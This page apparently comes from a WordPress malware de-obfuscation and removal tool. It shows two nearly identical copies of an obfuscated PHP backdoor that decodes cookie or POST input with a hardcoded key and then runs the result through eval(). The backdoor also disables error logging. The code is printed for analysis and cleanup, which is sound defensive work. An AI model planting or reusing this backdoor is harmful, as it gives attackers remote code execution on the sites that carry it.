De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $j5056231 = 265; $GLOBALS['tfa259'] = array(); global $tfa259; $tfa259 = $GLOBALS; $GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0 } (OTv = 5L; ShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7"; $tfa259["zb853b580"] = "chr"; $tfa259["i5695cb"] = "ord"; $tfa259["wd8d"] = "strlen"; $tfa259["y97692979"] = "define"; $tfa259["id59ec8"] = "defined"; $tfa259["f803d"] = "ini_set"; $tfa259["obe5"] = "serialize"; $tfa259["s21148f"] = "phpversion"; $tfa259["g7f068"] = "unserialize"; $tfa259["qf92d7d0e"] = "base64_decode"; $tfa259["je59e0"] = "set_time_limit"; $tfa259["p56623830"] = "s83ceb3"; $tfa259["ea8143686"] = "pa6885f"; $tfa259["qa480a2"] = $_POST; $tfa259["v09de2"] = $_COOKIE; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) { define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1); $tdf3557 = NULL; $o631 = NULL; $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a"; global $j046; function pa6885f($tdf3557, $j289) { global $tfa259; $se7a15f9 = ""; for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) { for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) { $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a])); } } return $se7a15f9; } function s83ceb3($tdf3557, $j289) { global $tfa259; global $j046; return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289); } foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) { $tdf3557 = $r2a770; $o631 = $j289; } if (!$tdf3557) { foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) { $tdf3557 = $r2a770; $o631 = $j289; } } $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631)); if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) { if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) { $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]); echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d); } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) { eval($tdf3557[$tfa259['l39c'][15]]); } exit; } }
<?php $j5056231 = 265; $GLOBALS['tfa259'] = array(); global $tfa259; $tfa259 = $GLOBALS; $GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0\r\n}\r\n\r\n(OTv = 5L;\r\nShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7"; $tfa259["zb853b580"] = "chr"; $tfa259["i5695cb"] = "ord"; $tfa259["wd8d"] = "strlen"; $tfa259["y97692979"] = "define"; $tfa259["id59ec8"] = "defined"; $tfa259["f803d"] = "ini_set"; $tfa259["obe5"] = "serialize"; $tfa259["s21148f"] = "phpversion"; $tfa259["g7f068"] = "unserialize"; $tfa259["qf92d7d0e"] = "base64_decode"; $tfa259["je59e0"] = "set_time_limit"; $tfa259["p56623830"] = "s83ceb3"; $tfa259["ea8143686"] = "pa6885f"; $tfa259["qa480a2"] = $_POST; $tfa259["v09de2"] = $_COOKIE; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) { define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1); $tdf3557 = NULL; $o631 = NULL; $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a"; global $j046; function pa6885f($tdf3557, $j289) { global $tfa259; $se7a15f9 = ""; for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) { for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) { $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a])); } } return $se7a15f9; } function s83ceb3($tdf3557, $j289) { global $tfa259; global $j046; return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289); } foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) { $tdf3557 = $r2a770; $o631 = $j289; } if (!$tdf3557) { foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) { $tdf3557 = $r2a770; $o631 = $j289; } } $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631)); if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) { if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) { $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]); echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d); } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) { eval($tdf3557[$tfa259['l39c'][15]]); } exit; } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.